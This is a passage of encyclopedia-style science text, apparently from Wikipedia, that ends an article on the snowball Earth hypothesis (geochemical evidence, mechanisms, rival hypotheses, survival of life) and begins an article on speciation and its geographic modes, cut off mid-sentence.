also believed to have caused a major positive shift in carbon isotopic ratios and contributed to the beginning of the Sturtian glaciation. During the proposed episode of snowball Earth, there are rapid and extreme negative excursions in the ratio of 13C to 12C. Close analysis of the timing of 13C 'spikes' in deposits across the globe allows the recognition of four, possibly five, glacial events in the late Neoproterozoic. Banded iron formations Banded iron formations (BIF) are sedimentary rocks of layered iron oxide and iron-poor chert. In the presence of oxygen, iron naturally rusts and becomes insoluble in water. The banded iron formations are commonly very old and their deposition is often related to the oxidation of Earth's atmosphere during the Palaeoproterozoic era, when dissolved iron in the ocean came in contact with photosynthetically produced oxygen and precipitated out as iron oxide. The bands were produced at the tipping point between an anoxic and an oxygenated ocean. Since today's atmosphere is oxygen-rich (nearly 21% by volume) and in contact with the oceans, it is not possible to accumulate enough iron oxide to deposit a banded formation. The only extensive iron formations that were deposited after the Palaeoproterozoic (after 1.8 billion years ago) are associated with Cryogenian glacial deposits. For such iron-rich rocks to be deposited there would have to be anoxia in the ocean, so that much dissolved iron (as ferrous oxide) could accumulate before it met an oxidant that would precipitate it as ferric oxide. For the ocean to become anoxic it must have limited gas exchange with the oxygenated atmosphere. Proponents of the hypothesis argue that the reappearance of BIF in the sedimentary record is a result of limited oxygen levels in an ocean sealed by sea-ice. Near the end of a glaciation period, a reestablishment of gas exchange between the ocean and atmosphere oxidised seawater rich in ferrous iron would occur. A positive shift in δ56FeIRMM-014 from the lower to upper layers of Cryogenian BIFs may reflect an increase in ocean acidification, as the upper layers were deposited as more and more oceanic ice cover melted away and more carbon dioxide was dissolved by the ocean. Opponents of the hypothesis suggest that the rarity of the BIF deposits may indicate that they formed in inland seas. Being isolated from the oceans, such lakes could have been stagnant and anoxic at depth, much like today's Black Sea; a sufficient input of iron could provide the necessary conditions for BIF formation. A further difficulty in suggesting that BIFs marked the end of the glaciation is that they are found interbedded with glacial sediments; such interbedding has been suggested to be an artefact of Milankovitch cycles, which would have periodically warmed the seas enough to allow gas exchange between the atmosphere and ocean and precipitate BIFs. Cap carbonate rocks Around the top of Neoproterozoic glacial deposits there is commonly a sharp transition into a chemically precipitated sedimentary limestone or dolomite metres to tens of metres thick. These cap carbonates sometimes occur in sedimentary successions that have no other carbonate rocks, suggesting that their deposition is result of a profound aberration in ocean chemistry. These cap carbonates have unusual chemical composition as well as strange sedimentary structures that are often interpreted as large ripples. The formation of such sedimentary rocks could be caused by a large influx of positively charged ions, as would be produced by rapid weathering during the extreme greenhouse following a snowball Earth event. The isotopic signature of the cap carbonates is near −5 ‰, consistent with the value of the mantle—such a low value could be taken to signify an absence of life, since photosynthesis usually acts to raise the value; alternatively the release of methane deposits could have lowered it from a higher value and counterbalance the effects of photosynthesis. The mechanism involved in the formation of cap carbonates is not clear, but the most cited explanation suggests that at the melting of a snowball Earth, water would dissolve the abundant from the atmosphere to form carbonic acid, which would fall as acid rain. This would weather exposed silicate and carbonate rock (including readily attacked glacial debris), releasing large amounts of calcium, which when washed into the ocean would form distinctively textured layers of carbonate sedimentary rock. Such an abiotic "cap carbonate" sediment can be found on top of the glacial till that gave rise to the snowball Earth hypothesis. However, there are some problems with the designation of a glacial origin to cap carbonates. The high carbon dioxide concentration in the atmosphere would cause the oceans to become acidic and dissolve any carbonates contained within—starkly at odds with the deposition of cap carbonates. The thickness of some cap carbonates is far above what could reasonably be produced in the relatively quick deglaciations. The cause is further weakened by the lack of cap carbonates above many sequences of clear glacial origin at a similar time and the occurrence of similar carbonates within the sequences of proposed glacial origin. An alternative mechanism, which may have produced the Doushantuo cap carbonate at least, is the rapid, widespread release of methane. This accounts for incredibly low—as low as −48 ‰— values—as well as unusual sedimentary features which appear to have been formed by the flow of gas through the sediments. Changing acidity Isotopes of boron suggest that the pH of the oceans dropped dramatically before and after the Marinoan glaciation. This may indicate a buildup of carbon dioxide in the atmosphere, some of which would dissolve into the oceans to form carbonic acid. Although the boron variations may be evidence of extreme climate change, they need not imply a global glaciation. Space dust Earth's surface is very depleted in iridium, which primarily resides in Earth's core. The only significant source of the element at the surface is cosmic particles that reach Earth. During a snowball Earth, iridium would accumulate on the ice sheets, and when the ice melted the resulting layer of sediment would be rich in iridium. An iridium anomaly has been discovered at the base of the cap carbonate formations and has been used to suggest that the glacial episode lasted for at least 3 million years, but this does not necessarily imply a global extent to the glaciation; indeed, a similar anomaly could be explained by the impact of a large meteorite. Cyclic climate fluctuations Using the ratio of mobile cations to those that remain in soils during chemical weathering (the chemical index of alteration), it has been shown that chemical weathering varied in a cyclic fashion within a glacial succession, increasing during interglacial periods and decreasing during cold and arid glacial periods. This pattern, if a true reflection of events, suggests that the "snowball Earths" bore a stronger resemblance to Pleistocene ice age cycles than to a completely frozen Earth. In addition, glacial sediments of the Port Askaig Tillite Formation in Scotland clearly show interbedded cycles of glacial and shallow marine sediments. The significance of these deposits is highly reliant upon their dating. Glacial sediments are difficult to date, and the closest dated bed to the Port Askaig group is 8 km stratigraphically above the beds of interest. Its dating to 600 Ma means the beds can be tentatively correlated to the Sturtian glaciation, but they may represent the advance or retreat of a snowball Earth. Mechanisms The initiation of a snowball Earth event would involve some initial cooling mechanism, which would result in an increase in Earth's coverage of snow and ice. The increase in Earth's coverage of snow and ice would in turn increase Earth's albedo, which would result in positive feedback for cooling. If enough snow and ice accumulates, run-away cooling would result. This positive feedback is facilitated by an equatorial continental distribution, which would allow ice to accumulate in the regions closer to the equator, where solar radiation is most direct. Many possible triggering mechanisms could account for the beginning of a snowball Earth, such as the eruption of a supervolcano, a reduction in the atmospheric concentration of greenhouse gases such as methane and/or carbon dioxide, changes in Solar energy output, or perturbations of Earth's orbit. Regardless of the trigger, initial cooling results in an increase in the area of Earth's surface covered by ice and snow, and the additional ice and snow reflects more solar energy back to space, further cooling Earth and further increasing the area of Earth's surface covered by ice and snow. This positive feedback loop could eventually produce a frozen equator as cold as modern Antarctica. Global warming associated with large accumulations of carbon dioxide in the atmosphere over millions of years, emitted primarily by volcanic activity, is the proposed trigger for melting a snowball Earth. Due to positive feedback for melting, the eventual melting of the snow and ice covering most of Earth's surface would require as little as a millennium. Initiation of glaciation A tropical distribution of the continents is, perhaps counter-intuitively, necessary to allow the initiation of a snowball Earth. Tropical continents are more reflective than open ocean and so absorb less of the Sun's heat: most absorption of solar energy on Earth today occurs in tropical oceans. Further, tropical continents are subject to more rainfall, which leads to increased river discharge and erosion. When exposed to air, silicate rocks undergo weathering reactions which remove carbon dioxide from the atmosphere. These reactions proceed in the general form Rock-forming mineral + CO2 + H2O → cations + bicarbonate + SiO2 An example of such a reaction is the weathering of wollastonite: CaSiO3 + 2 CO2 + H2O → Ca2+ + SiO2 + 2 The released calcium cations react with the dissolved bicarbonate in the ocean to form calcium carbonate as a chemically precipitated sedimentary rock. This transfers carbon dioxide, a greenhouse gas, from the air into the geosphere, and, in steady-state on geologic time scales, offsets the carbon dioxide emitted from volcanoes into the atmosphere. As of 2003, a precise continental distribution during the Neoproterozoic was difficult to establish because there were too few suitable sediments for analysis. Some reconstructions point towards polar continents—which have been a feature of all other major glaciations, providing a point upon which ice can nucleate. Changes in ocean circulation patterns may then have provided the trigger of snowball Earth. Additional factors that may have contributed to the onset of the Neoproterozoic snowball include the introduction of atmospheric free oxygen, which may have reached sufficient quantities to react with methane in the atmosphere, oxidizing it to carbon dioxide, a much weaker greenhouse gas, and a younger—thus fainter—Sun, which would have emitted 6 percent less radiation in the Neoproterozoic. Normally, as Earth gets colder due to natural climatic fluctuations and changes in incoming solar radiation, the cooling slows these weathering reactions. As a result, less carbon dioxide is removed from the atmosphere and Earth warms as this greenhouse gas accumulates—this 'negative feedback' process limits the magnitude of cooling. During the Cryogenian, however, Earth's continents were all at tropical latitudes, which made this moderating process less effective, as high weathering rates continued on land even as Earth cooled. This caused ice to advance beyond the polar regions. Once ice advanced to within 30° of the equator, a positive feedback could ensue such that the increased reflectiveness (albedo) of the ice led to further cooling and the formation of more ice, until the whole Earth is ice-covered. Polar continents, because of low rates of evaporation, are too dry to allow substantial carbon deposition—restricting the amount of atmospheric carbon dioxide that can be removed from the carbon cycle. A gradual rise of the proportion of the isotope 13C relative to 12C in sediments pre-dating "global" glaciation indicates that draw-down before snowball Earths was a slow and continuous process. The start of snowball Earths are marked by a sharp downturn in the δ13C value of sediments, a hallmark that may be attributed to a crash in biological productivity as a result of the cold temperatures and ice-covered oceans. In January 2016, Gernon et al. proposed a "shallow-ridge hypothesis" involving the breakup of Rodinia, linking the eruption and rapid alteration of hyaloclastites along shallow ridges to massive increases in alkalinity in an ocean with thick ice cover. Gernon et al. demonstrated that the increase in alkalinity over the course of glaciation is sufficient to explain the thickness of cap carbonates formed in the aftermath of Snowball Earth events. Dating of the Sturtian glaciation's onset has found it to be coeval with the emplacement of a large igneous province in the tropics. Weathering of this equatorial large igneous province is believed to have sucked enough carbon dioxide out of the air to enable the development of major glaciation. During the frozen period Global temperature fell so low that the equator was as cold as modern-day Antarctica. This low temperature was maintained by the high albedo of the ice sheets, which reflected most incoming solar energy into space. A lack of heat-retaining clouds, caused by water vapor freezing out of the atmosphere, amplified this effect. Degassing of carbon dioxide has been speculated to have been unusually low during the Cryogenian, enabling the persistence of global glaciation. Breaking out of global glaciation The carbon dioxide levels necessary to thaw Earth have been estimated as being 350 times what they are today, about 13% of the atmosphere. Since Earth was almost completely covered with ice, carbon dioxide could not be withdrawn from the atmosphere by release of alkaline metal ions weathering out of siliceous rocks. Over 4 to 30 million years, enough and methane, mainly emitted by volcanoes but also produced by microbes converting organic carbon trapped under the ice into the gas, would accumulate to finally cause enough greenhouse effect to make surface ice melt in the tropics until a band of permanently ice-free land and water developed; this would be darker than the ice and thus absorb more energy from the Sun—initiating a "positive feedback". The first areas to become free of permanent ice cover may have been in the mid-latitudes rather than in the tropics, because a rapid hydrological cycle would have inhibited the melting of ice at low latitudes. As these mid-latitude regions became ice free, dust from them blew over onto ice sheets elsewhere, decreasing their albedo and accelerating the process of deglaciation. Destabilization of substantial deposits of methane hydrates locked up in low-latitude permafrost may also have acted as a trigger and/or strong positive feedback for deglaciation and warming. Methanogens were an important contributor to the deglaciation of the Marinoan Snowball Earth. The return of high primary productivity in surficial waters fueled extensive microbial sulphur reduction, causing deeper waters to become highly euxinic. Euxinia caused the formation of large amounts of methyl sulphides, which in turn was converted into methane by methanogens. A major negative nickel isotope excursion confirms high methanogenic activity during this period of deglaciation and global warming. On the continents, the melting of glaciers would release massive amounts of glacial deposit, which would erode and weather. The resulting sediments supplied to the ocean would be high in nutrients such as phosphorus, which combined with the abundance of would trigger a cyanobacteria population explosion, which would cause a relatively rapid reoxygenation of the atmosphere and may have contributed to the rise of the Ediacaran biota and the subsequent Cambrian explosion—a higher oxygen concentration allowing large multicellular lifeforms to develop. Although the positive feedback loop would melt the ice in geological short order, perhaps less than 1,000 years, replenishment of atmospheric oxygen and depletion of the levels would take further millennia. It is possible that carbon dioxide levels fell enough for Earth to freeze again; this cycle may have repeated until the continents had drifted to more polar latitudes. More recent evidence suggests that with colder oceanic temperatures, the resulting higher ability of the oceans to dissolve gases led to the carbon content of sea water being more quickly oxidized to carbon dioxide. This leads directly to an increase of atmospheric carbon dioxide, enhanced greenhouse warming of Earth's surface, and the prevention of a total snowball state. During millions of years, cryoconite would have accumulated on and inside the ice. Psychrophilic microorganisms, volcanic ash and dust from ice-free locations would settle on ice covering several million square kilometers. Once the ice started to melt, these layers would become visible and darken the icy surfaces, helping to accelerate the process. Also, ultraviolet light from the Sun produced hydrogen peroxide (H2O2) when it hit water molecules. Normally H2O2 breaks down in sunlight, but some would have been trapped inside the ice. When the glaciers started to melt, it would have been released in both the ocean and the atmosphere, where it was split into water and oxygen molecules, increasing atmospheric oxygen. Slushball Earth hypothesis While the presence of glaciers is not disputed, the idea that the entire planet was covered in ice is more contentious, leading some scientists to posit a "slushball Earth", in which a band of ice-free, or ice-thin, waters remains around the equator, allowing for a continued hydrologic cycle. This hypothesis appeals to scientists who observe certain features of the sedimentary record that can only be formed under open water or rapidly moving ice (which would require somewhere ice-free to move to). Recent research observed geochemical cyclicity in clastic rocks, showing that the snowball periods were punctuated by warm spells, similar to ice age cycles in recent Earth history. Attempts to construct computer models of a snowball Earth have struggled to accommodate global ice cover without fundamental changes in the laws and constants which govern the planet. A less extreme snowball Earth hypothesis involves continually evolving continental configurations and changes in ocean circulation. Synthesised evidence has produced slushball Earth models where the stratigraphic record does not permit postulating complete global glaciations. Kirschvink's original hypothesis had recognised that warm tropical puddles would be expected to exist in a snowball Earth. A more extreme hypothesis, the Waterbelt Earth hypothesis, suggests that ice-free areas of ocean continued to exist even as tropical continents were glaciated. Scientific dispute The argument against the hypothesis is evidence of fluctuation in ice cover and melting during "snowball Earth" deposits. Evidence for such melting comes from evidence of glacial dropstones, geochemical evidence of climate cyclicity, and interbedded glacial and shallow marine sediments. A longer record from Oman, constrained to 13°N, covers the period from 712 to 545 million years ago—a time span containing the Sturtian and Marinoan glaciations—and shows both glacial and ice-free deposition. The snowball Earth hypothesis does not explain the alternation of glacial and interglacial events, nor the oscillation of glacial sheet margins. There have been difficulties in recreating a snowball Earth with global climate models. Simple GCMs with mixed-layer oceans can be made to freeze to the equator; a more sophisticated model with a full dynamic ocean (though only a primitive sea ice model) failed to form sea ice to the equator. In addition, the levels of necessary to melt a global ice cover have been calculated to be 130,000 ppm, which is considered by some to be unreasonably large. Strontium isotopic data have been found to be at odds with proposed snowball Earth models of silicate weathering shutdown during glaciation and rapid rates immediately post-glaciation. Therefore, methane release from permafrost during marine transgression was proposed to be the source of the large measured carbon excursion in the time immediately after glaciation. "Zipper rift" hypothesis Nick Eyles suggests that the Neoproterozoic Snowball Earth was in fact no different from any other glaciation in Earth's history, and that efforts to find a single cause are likely to end in failure. The "zipper rift" hypothesis proposes two pulses of continental "unzipping"—first, the breakup of Rodinia, forming the proto-Pacific Ocean; then the splitting of the continent Baltica from Laurentia, forming the proto-Atlantic—coincided with the glaciated periods. The associated tectonic uplift would form high plateaus, just as the East African Rift is responsible for high topography; this high ground could then host glaciers. Banded iron formations have been taken as unavoidable evidence for global ice cover, since they require dissolved iron ions and anoxic waters to form; however, the limited extent of the Neoproterozoic banded iron deposits means that they may have formed in inland seas rather than in frozen oceans. Such seas can experience a wide range of chemistries; high rates of evaporation could concentrate iron ions, and a periodic lack of circulation could allow anoxic bottom water to form. Continental rifting, with associated subsidence, tends to produce such landlocked water bodies. This rifting, and associated subsidence, would produce the space for the fast deposition of sediments, negating the need for an immense and rapid melting to raise the global sea levels. High-obliquity hypothesis A competing hypothesis to explain the presence of ice on the equatorial continents was that Earth's axial tilt was quite high, in the vicinity of 60°, which would place Earth's land in high "latitudes", although supporting evidence is scarce. A less extreme possibility would be that it was merely Earth's magnetic pole that wandered to this inclination, as the magnetic readings which suggested ice-filled continents depend on the magnetic and rotational poles being relatively similar. In either of these two situations, the freeze would be limited to relatively small areas, as is the case today; severe changes to Earth's climate are not necessary. Inertial interchange true polar wander The evidence for low-latitude glacial deposits during the supposed snowball Earth episodes has been reinterpreted via the concept of inertial interchange true polar wander. This hypothesis, created to explain palaeomagnetic data, suggests that Earth's orientation relative to its axis of rotation shifted one or more times during the general time-frame attributed to snowball Earth. This could feasibly produce the same distribution of glacial deposits without requiring any of them to have been deposited at equatorial latitude. While the physics behind the proposition is sound, the removal of one flawed data point from the original study rendered the application of the concept in these circumstances unwarranted. Survival of life through frozen periods A tremendous glaciation would curtail photosynthetic life on Earth, thus depleting atmospheric oxygen, and thereby allowing non-oxidized iron-rich rocks to form. Detractors argue that this kind of glaciation would have made life extinct entirely. However, microfossils such as stromatolites and oncolites prove that, in shallow marine environments at least, life did not suffer any perturbation. Instead life developed a trophic complexity and survived the cold period unscathed. Proponents counter that it may have been possible for life to survive in these ways: In reservoirs of anaerobic and low-oxygen life powered by chemicals in deep oceanic hydrothermal vents surviving in Earth's deep oceans and crust; but photosynthesis would not have been possible there. Under the ice layer, in chemolithotrophic (mineral-metabolizing) ecosystems theoretically resembling those in existence in modern glacier beds, high-alpine and Arctic talus permafrost, and basal glacial ice. This is especially plausible in areas of volcanism or geothermal activity. In pockets of liquid water within and under the ice caps, similar to Lake Vostok in Antarctica. In theory, this system may resemble microbial communities living in the perennially frozen lakes of the Antarctic dry valleys. Photosynthesis can occur under ice up to 20 m thick, and at the temperatures predicted by models, equatorial sublimation would prevent equatorial ice thickness from exceeding 10 m. As eggs and dormant cells and spores deep-frozen into ice during the most severe phases of the frozen period. In small regions of open sea water: polynya. These natural ice holes can occur from the action of winds, currents or a local heat source (e.g. geothermal), even if the surrounding sea is completely frozen over. They could preserve enclaves of photosynthesizers (not multicellular plants, which did not yet exist) with access to light and to generate trace amounts of oxygen, enough to sustain some oxygen-dependent organisms. It is not necessary that a hole form in the ice, merely that some parts of the ice become thin enough to admit light. These small regions may have occurred in deep ocean, far from Rodinia or its remnants as it broke apart and drifted on the tectonic plates. In layers of "dirty ice" on top of the ice sheet covering shallow seas below. Animals and mud from the sea would be frozen into the base of the ice and gradually concentrate on the top as the ice above evaporates. Small ponds of water would teem with life thanks to the flow of nutrients through the ice. Such environments may have covered approximately 12 per cent of the global surface area. In small oases of liquid water, as would be found near geothermal hotspots resembling Iceland today. In nunatak areas in the tropics, where daytime tropical sun or volcanic heat heated bare rock sheltered from cold wind and made small temporary melt pools, which would freeze at sunset. Oxygenated subglacial meltwater, along with iron-rich sediments dissolved in the glacial water, created a meltwater oxygen pump when it entered the ocean, where it provided eukaryotes with some oxygen, and both photosynthetic and chemosynthetic organisms with sufficient nutrients to support an ecosystem. The freshwater would also mix with the hypersaline seawater, which created areas less hostile to eukaryotic life than elsewhere in the ocean. However, organisms and ecosystems, as far as it can be determined by the fossil record, do not appear to have undergone the significant change that would be expected by a mass extinction. With the advent of more precise dating, a phytoplankton extinction event which had been associated with snowball Earth was shown to precede glaciations by 16 million years. Even if life were to cling on in all the ecological refuges listed above, a whole-Earth glaciation would result in a biota with a noticeably different diversity and composition. This change in diversity and composition has not yet been observed—in fact, the organisms which should be most susceptible to climatic variation emerge unscathed from the snowball Earth. One rebuttal to this is the fact that in many of these places where an argument is made against a mass extinction caused by snowball Earth, the Cryogenian fossil record is impoverished. Implications A snowball Earth has profound implications in the history of life on Earth. While many refugia have been postulated, global ice cover would certainly have ravaged ecosystems dependent on sunlight. Geochemical evidence from rocks associated with low-latitude glacial deposits have been interpreted to show a crash in oceanic life during the glacials. High magnitude glacial retreats favoured the survival of macroalgae. Because about half of the oceans' water was frozen solid as ice, the remaining water would be twice as salty as it is today, lowering its freezing point. When the ice sheet melted under a hot atmosphere rich in carbon dioxide, it would cover the oceans with a layer of warm (50°C) freshwater up to 2 kilometres thick. Only after the warm surface water mixed with the colder and deeper saltwater did the sea return to a warmer and less salty state. The melting of the ice may have presented many new opportunities for diversification, and may indeed have driven the rapid evolution which took place at the end of the Cryogenian period. Global ice cover, if it existed, may—in concert with geothermal heating—have led to a lively, well mixed ocean with great vertical convective circulation. Effect on early evolution The Neoproterozoic was a time of remarkable diversification of multicellular organisms, including animals. Organism size and complexity increased considerably after the end of the snowball glaciations. This rapid development of multicellular organisms may have been the result of increased evolutionary pressures resulting from multiple icehouse-hothouse cycles; in this sense, snowball Earth episodes may have "pumped" evolution, much as glaciations during the Pleistocene are known to have acted as a diversity pump in Antarctica. Alternatively, fluctuating copper levels and rising oxygen may have played a part. Many Sturtian diamictites unconformably overlie copper-mineralised strata in Greenland, North America, Australia, and Africa; the glacial breakup and erosion of rocks heavily enriched in copper during the Sturtian glaciation, combined with the chemical weathering of the Franklin Large Igneous Province, greatly elevated copper concentrations in the ocean. Because copper is an essential component of many proteins involved in mitigating oxygen toxicity, synthesising adenosine triphosphate, and producing elastin and collagen, among other biological functions, this spike in copper concentrations was essential to the explosive evolution of multicellular life throughout the latter portion of the Neoproterozoic. Elevated copper concentrations persisted into the Cambrian explosion at the beginning of the Phanerozoic and likely influenced its course too. One hypothesis which has been gaining currency in recent years: that early snowball Earths did not so much affect the evolution of life on Earth as result from it. In fact the two hypotheses are not mutually exclusive. The idea is that Earth's life forms affect the global carbon cycle and so major evolutionary events alter the carbon cycle, redistributing carbon within various reservoirs within the biosphere system and in the process temporarily lowering the atmospheric (greenhouse) carbon reservoir until the revised biosphere system settled into a new state. The cool period of the Huronian glaciation is speculated to be linked to the decline in the atmospheric content of greenhouse gases during the Great Oxygenation Event. Similarly, the possible snowball Earth of the Precambrian's Cryogenian between 580 and 850 million years ago (and which itself had a number of distinct episodes) could be related to the rise of more advanced multicellular animal life and life's colonisation of the land. However, a 2022 study, based on findings of previous studies, suggested land plant evolution was driven by the Cryogenian glaciations, which they also theorized to be the reason why the Zygnematophyceae (sister group of land plants) became unicellular and cryophilic, lost their flagella and evolved sexual conjugation. Occurrence and timing Palaeoproterozoic The Snowball Earth hypothesis has been invoked to explain glacial deposits in the Huronian Supergroup of Canada, though the palaeomagnetic evidence that suggests ice sheets at low latitudes is contested, and stratigraphic evidence clearly shows only three distinct depositions of glacial material (the Ramsay, Bruce and Gowganda Formations) separated by significant periods without. The glacial sediments of the Makganyene formation of South Africa are slightly younger than the Huronian glacial deposits (~2.25 billion years old) and were possibly deposited at tropical latitudes. It has been proposed that rise of free oxygen that occurred during the Great Oxygenation Event removed atmospheric methane through oxidation. As the solar irradiance was notably weaker at the time, Earth's climate may have relied on methane, a powerful greenhouse gas, to maintain surface temperatures above freezing. In the absence of this methane greenhousing, temperatures plunged and a global glaciation could have occurred between 2.5 and 2.2 Gya, during the Siderian and Rhyacian periods of the Paleoproterozoic era. Neoproterozoic There were three or four significant ice ages during the late Neoproterozoic. Of these, the Marinoan was the most significant, and the Sturtian glaciations were also widespread. Even the leading snowball proponent Hoffman agrees that the 350 thousand-year-long Gaskiers glaciation did not lead to global glaciation, although it was probably as intense as the late Ordovician glaciation. The status of the Kaigas "glaciation" or "cooling event" is currently unclear; some scientists do not recognise it as a glacial, others suspect that it may reflect poorly dated strata of Sturtian association, and others believe it may indeed be a third ice age. It was certainly less significant than the Sturtian or Marinoan glaciations, and probably not global in extent. Emerging evidence suggests that Earth underwent a number of glaciations during the Neoproterozoic, which would stand strongly at odds with the snowball hypothesis.
Physical sciences
Events
Earth science
29000
https://en.wikipedia.org/wiki/Speciation
Speciation
Speciation is the evolutionary process by which populations evolve to become distinct species. The biologist Orator F. Cook coined the term in 1906 for cladogenesis, the splitting of lineages, as opposed to anagenesis, phyletic evolution within lineages. Charles Darwin was the first to describe the role of natural selection in speciation in his 1859 book On the Origin of Species. He also identified sexual selection as a likely mechanism, but found it problematic. There are four geographic modes of speciation in nature, based on the extent to which speciating populations are isolated from one another: allopatric, peripatric, parapatric, and sympatric. Whether genetic drift is a minor or major contributor to speciation is the subject of much ongoing discussion. Rapid sympatric speciation can take place through polyploidy, such as by doubling of chromosome number; the result is progeny which are immediately reproductively isolated from the parent population. New species can also be created through hybridization, followed by reproductive isolation, if the hybrid is favoured by natural selection. Historical background In addressing the origin of species, there are two key issues: the evolutionary mechanisms of speciation how the separateness and individuality of species is maintained Since Charles Darwin's time, efforts to understand the nature of species have primarily focused on the first aspect, and it is now widely agreed that the critical factor behind the origin of new species is reproductive isolation. Darwin's dilemma: why do species exist? In On the Origin of Species (1859), Darwin interpreted biological evolution in terms of natural selection, but was perplexed by the clustering of organisms into species. Chapter 6 of Darwin's book is entitled "Difficulties of the Theory". In discussing these "difficulties" he noted This dilemma can be described as the absence or rarity of transitional varieties in habitat space. Another dilemma, related to the first one, is the absence or rarity of transitional varieties in time. Darwin pointed out that by the theory of natural selection "innumerable transitional forms must have existed", and wondered "why do we not find them embedded in countless numbers in the crust of the earth". That clearly defined species actually do exist in nature in both space and time implies that some fundamental feature of natural selection operates to generate and maintain species. Effect of sexual reproduction on species formation It has been argued that the resolution of Darwin's first dilemma lies in the fact that out-crossing sexual reproduction has an intrinsic cost of rarity. The cost of rarity arises as follows. If, on a resource gradient, a large number of separate species evolve, each exquisitely adapted to a very narrow band on that gradient, each species will, of necessity, consist of very few members. Finding a mate under these circumstances may present difficulties when many of the individuals in the neighborhood belong to other species. Under these circumstances, if any species' population size happens, by chance, to increase (at the expense of one or other of its neighboring species, if the environment is saturated), this will immediately make it easier for its members to find sexual partners. The members of the neighboring species, whose population sizes have decreased, experience greater difficulty in finding mates, and therefore form pairs less frequently than the larger species. This has a snowball effect, with large species growing at the expense of the smaller, rarer species, eventually driving them to extinction. Eventually, only a few species remain, each distinctly different from the other. Rarity not only imposes the risk of failure to find a mate, but it may also incur indirect costs, such as the resources expended or risks taken to seek out a partner at low population densities. Rarity brings with it other costs. Rare and unusual features are very seldom advantageous. In most instances, they indicate a (non-silent) mutation, which is almost certain to be deleterious. It therefore behooves sexual creatures to avoid mates sporting rare or unusual features (koinophilia). Sexual populations therefore rapidly shed rare or peripheral phenotypic features, thus canalizing the entire external appearance, as illustrated in the accompanying image of the African pygmy kingfisher, Ispidina picta. This uniformity of all the adult members of a sexual species has stimulated the proliferation of field guides on birds, mammals, reptiles, insects, and many other taxa, in which a species can be described with a single illustration (or two, in the case of sexual dimorphism). Once a population has become as homogeneous in appearance as is typical of most species (and is illustrated in the photograph of the African pygmy kingfisher), its members will avoid mating with members of other populations that look different from themselves. Thus, the avoidance of mates displaying rare and unusual phenotypic features inevitably leads to reproductive isolation, one of the hallmarks of speciation. In the contrasting case of organisms that reproduce asexually, there is no cost of rarity; consequently, there are only benefits to fine-scale adaptation. Thus, asexual organisms very frequently show the continuous variation in form (often in many different directions) that Darwin expected evolution to produce, making their classification into "species" (more correctly, morphospecies) very difficult. Modes All forms of natural speciation have taken place over the course of evolution; however, debate persists as to the relative importance of each mechanism in driving biodiversity. One example of natural speciation is the diversity of the three-spined stickleback, a marine fish that, after the last glacial period, has undergone speciation into new freshwater colonies in isolated lakes and streams. Over an estimated 10,000 generations, the sticklebacks show structural differences that are greater than those seen between different genera of fish including variations in fins, changes in the number or size of their bony plates, variable jaw structure, and color differences. Allopatric During allopatric (from the ancient Greek allos, "other" + patrā, "fatherland") speciation, a population splits into two geographically isolated populations (for example, by habitat fragmentation due to geographical change such as mountain formation). The isolated populations then undergo genotypic or phenotypic divergence as: (a) they become subjected to dissimilar selective pressures; (b) different mutations arise in the two populations. When the populations come back into contact, they have evolved such that they are reproductively isolated and are no longer capable of exchanging genes. Island genetics is the term associated with the tendency of small, isolated genetic pools to produce unusual traits. Examples include insular dwarfism and the radical changes among certain famous island chains, for example on Komodo. The Galápagos Islands are particularly famous for their influence on Charles Darwin. During his five weeks there he heard that Galápagos tortoises could be identified by island, and noticed that finches differed from one island to another, but it was only nine months later that he speculated that such facts could show that species were changeable. When he returned to England, his speculation on evolution deepened after experts informed him that these were separate species, not just varieties, and famously that other differing Galápagos birds were all species of finches. Though the finches were less important for Darwin, more recent research has shown the birds now known as Darwin's finches to be a classic case of adaptive evolutionary radiation. Peripatric In peripatric speciation, a subform of allopatric speciation, new species are formed in isolated, smaller peripheral populations that are prevented from exchanging genes with the main population. It is related to the concept of a founder effect, since small populations often undergo bottlenecks. Genetic drift is often proposed to play a significant role in peripatric speciation. Case studies include Mayr's investigation of bird fauna; the Australian bird Petroica multicolor; and reproductive isolation in populations of Drosophila subject to population bottlenecking. Parapatric In parapatric speciation, there is only partial separation of the zones of two diverging populations afforded by geography; individuals of each species may come in contact or cross habitats from time to time, but reduced fitness of the heterozygote leads to selection for behaviours or mechanisms that prevent their interbreeding. Parapatric speciation is modelled on continuous variation within a "single", connected habitat acting as a source of natural selection rather than the effects of isolation of habitats produced in peripatric and allopatric speciation. Parapatric speciation may be associated with differential landscape-dependent selection. Even if there is a gene flow between two populations, strong differential selection may impede assimilation and different species may eventually develop. Habitat differences may be more important in the development of reproductive isolation than the isolation time. Caucasian rock lizards Darevskia rudis, D. valentini and D. portschinskii all hybridize with each other in their hybrid zone; however, hybridization is stronger between D. portschinskii and D. rudis, which separated earlier but live in similar habitats than between D. valentini and two other species, which separated later but live in climatically different habitats. Ecologists refer to parapatric and peripatric speciation in terms of ecological niches. A niche must be available in order for a new species to be successful. Ring species such as Larus gulls have been claimed to illustrate speciation in progress, though the situation may be more complex. The grass Anthoxanthum odoratum may be starting parapatric speciation in areas of mine contamination. Sympatric Sympatric speciation is the formation of two or more descendant species from a single ancestral species all occupying the same geographic location. Often-cited examples of sympatric speciation are found in insects that become dependent on different host plants in the same area. The best known example of sympatric speciation is that of the cichlids of East Africa inhabiting the Rift Valley lakes, particularly Lake Victoria, Lake Malawi and Lake Tanganyika. There are over 800 described species, and according to estimates, there could be well over 1,600 species in the region. Their evolution is cited as an example of both natural and sexual selection. A 2008 study suggests that sympatric speciation has occurred in Tennessee cave salamanders. Sympatric speciation driven by ecological factors may also account for the extraordinary diversity of crustaceans living in the depths of Siberia's Lake Baikal. Budding speciation has been proposed as a particular form of sympatric speciation, whereby small groups of individuals become progressively more isolated from the ancestral stock by breeding preferentially with one another. This type of speciation would be driven by the conjunction of various advantages of inbreeding such as the expression of advantageous recessive phenotypes, reducing the recombination load, and reducing the cost of sex. The hawthorn fly (Rhagoletis pomonella), also known as the apple maggot fly, appears to be undergoing sympatric speciation. Different populations of hawthorn fly feed on different fruits. A distinct population emerged in North America in the 19th century some time after apples, a non-native species, were introduced. This apple-feeding population normally feeds only on apples and not on the historically preferred fruit of hawthorns. The current hawthorn feeding population does not normally feed on apples. Some evidence, such as that six out of thirteen allozyme loci are different, that hawthorn flies mature later in the season and take longer to mature than apple flies; and that there is little evidence of interbreeding (researchers have documented a 4–6% hybridization rate) suggests that sympatric speciation is occurring. Methods of selection Reinforcement Reinforcement, also called the Wallace effect, is the process by which natural selection increases reproductive isolation. It may occur after two populations of the same species are separated and then come back into contact. If their reproductive isolation was complete, then they will have already developed into two separate incompatible species. If their reproductive isolation is 